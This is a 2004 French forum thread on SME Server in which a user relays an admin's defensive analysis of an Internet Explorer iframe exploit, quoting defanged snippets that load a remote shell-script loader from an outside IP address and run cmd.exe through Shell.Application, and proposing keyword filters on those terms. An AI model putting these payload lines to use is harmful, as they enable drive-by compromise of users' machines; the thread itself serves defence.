bloquer des iframes avec SME:(ADODB.Stream)

Forum dédié à la distribution du même nom et que vous pourrez télécharger sur http://www.contribs.org. La nouvelle version de cette distribution se nomme SME Server

Modérateur: modos Ixus

bloquer des iframes avec SME:(ADODB.Stream)

Messagepar Taltos » 06 Juil 2004 14:14

Bonjour je viens de recevoir un mail qui m'interpelle:
la discussion partait sur la nouvelle faille IE

l'explication de cet admin est claire et interresante a lire (si vous avez le temps) je me demandais dans quelle mesure ce filtrage la etait faisable par SME ? (j'ai pas réfléchi a la question, je vous livre cela brut de fonderie)

A pluche



je me suis laisser emporter... a cause d'une discussion en interne a ce sujet et de l'incompréhension des mes users.... veuillez m'excuser...

je vais modérer donc mes propos et tenter de m'expliquer, a défaut d'expliquer...

En fait cette faille exploite plusieurs autres failles connues... les I frames principalement, je ne vais pas vous faire un cours, juste expliquer pourquoi.

Ces i frames que l'on retrouve dans presque tout les emails sans attachements mais qui exectutent des applications (en gros ce sont des Frames HTML dans lesquels on peut inclure d'autres pages... si ces frames ont des tailles visible de 0 -> 99.99% de chance que ce soit un malware, de meme si ces frames sont positionner hors ecran... d'ou une position > 800x600 (ou 1024x768... tres souvent un malware place l'i frame en 10000 x 10000, a ma connaissance il n'y a aucune station normale qui possède une résolution pareil, et aucun site "normale" n'a de raison d'afficher une page, un frame ou ce que vous voulez en dehors de l'écran)

voila donc pourquoi rien ne s'affiche chez moi, car l'I frame de base tente de s'ouvrir en dehors de l'écran, donc -> Malware ou/et virus... donc on bloque...

dans le cas du link donné :
j'ai du mettre un underscore dans certains mot, pour :
* etre certains que votre lecteur n'aura pas la bonne idée d'executer le code...
* ne pas me faire censurer par les robots d'analyse de mail...

il contient ceci, (entre autre)

show_ModalDia_log('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialogHeight:1\;dialogWidth:1\;").location="vbsc_ript:\"<SC_RIPT SRC='http://62.131.86.111/security/idiots/malware2k/shells_cript_loader.js'><\/scr_ipt>\"";

on peut y voir :
* dialogTop et dialogLeft sont HORS ecran !
* dialogHeight et dialogWidth ont une taille de 1

c'est donc pratique d'afficher une fenetre en dehors de l'écran avec une taille ridicule => on ne permet meme pas a la page de passer vers le poste client... trop de facteurs "stupides"
-> première raison de bloquer la page...

plus bas dans cette page...

document.write('<I_FRAME ID=myif_rame NAME=myifra_me SRC="redir.jsp" style=display:none;></I_FRAME>');

* style=display:none -> Intéressant de ne pas voir une fenetre WEB, utile aussi ... ca n'a donc pas d'interet dans 95% des cas, sauf si on a de mauvaise idée en tete...
-> deuxième raison de bloquer la page

ces deux filtres fonctionne chez moi de facon indépendante... ils ont réagit tout les deux... et on interdit l'acces a la page...

mais allons plus loins et regardons le fichier "shellsc/ript_loader.js"

doc_ument.wri_te("<I_FRAME ID=myifra_me SRC='about:blank' WIDTH=200 HEIGHT=200></I_FRAME>");
* cet I frame aurait pu tromper mes systemes de surveillance...

il charge ensuite dedans un autre ficihier "shellscr/ipt.js"

doc_ument.frames[0].document.body.insertAdjacentHTML('afterBegin','injected<scr_ipt language="JSc_ript" DEFER>var obj=new ActiveX_Object("S_hell.Applica_tion");obj.ShellE_xecute("cm_d.exe","/c pause");</sc_ript>');

* alors la c'est le pompon, n'importe quel proxy devrait bannir ce type de page :
New Act_iveXObject mais c'est surtout le paramètre qui devrait alarmer "Sh_ell.App_lication"
et trouver en plus dans le meme fichier quelque chose comme "ShellEx_ecute" ou "C_md.exe"...

donc, si une regle devait etre appliquer pour juger de la pertinance d'une page, c'est bien ces mots la, avant meme les fameux "$%#&!, ou sexe, etc..." mais là c'est un autre débat du genre de celui que l'on a tenter de me faire ce matin....

se protéger n'est pas une mince affaire, mais un peu d'analyse du processus d'attaque via le WEB permet souvent de comprendre et d'arreter avant l'intrusion...

bien a vous,
encore merci a tout ceux qui m'ont lu,
si vous avez des questions n'hésitez pas, je vous le dois bien...
Avatar de l’utilisateur
Taltos
Lieutenant de vaisseau
Lieutenant de vaisseau
 
Messages: 227
Inscrit le: 27 Jan 2004 01:00
Localisation: Nantes

Messagepar Muzo » 06 Juil 2004 14:26

Salut,

Oui l'analyse est bonne mais, ...
Si tu as peur de recevoir ce genre de mail, tu mets ton serveur de mail en mode text brute, et tout code html sera transformé en text. Donc ton code html ne sera pas exécuté. Tu peux aussi paramétré ton client mail de la même manière.

Enfin bon c'était des idées simples comme ca ....
/Muzo
"La vie n'est pas un combat, mais une passion à défendre!" MASS HYSTERIA - Knowledge is power
Avatar de l’utilisateur
Muzo
Amiral
Amiral
 
Messages: 5236
Inscrit le: 07 Mai 2003 00:00
Localisation: BNF! Je me culturise.


Retour vers E-Smith / SME Server

Qui est en ligne ?

Utilisateur(s) parcourant actuellement ce forum : Aucun utilisateur inscrit et 1 invité